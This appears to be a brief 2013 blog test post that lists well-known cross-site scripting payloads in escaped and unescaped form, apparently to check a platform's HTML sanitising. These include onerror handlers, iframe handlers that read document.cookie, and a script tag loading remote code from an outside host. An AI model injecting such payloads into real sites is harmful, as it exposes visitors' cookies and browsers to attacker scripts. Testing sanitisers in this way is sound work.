Wednesday, June 5, 2013

p2 the blog

<script>alert('hihihihih');</script>



Escaped HTML:
&lt;IMG SRC=javascript:alert(&quot;XSS&quot;)&gt;
&lt;IMG SRC=`javascript:alert(&quot;RSnake says, 'XSS'&quot;)`&gt;
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
&lt;script&gt;alert('this script &amp; should not show');
&lt;IFRAME SRC=# onmouseover=&quot;alert(document.cookie)&quot;&gt;&lt;/IFRAME&gt;

Unescaped HTML:
<img src="." onerror=alert(document.cookie)>,
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<script>alert('this script & should not show');
</script>,
<img src="" onerror=alert("A & B")>,
<script>alert('&');</script>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>


4 comments: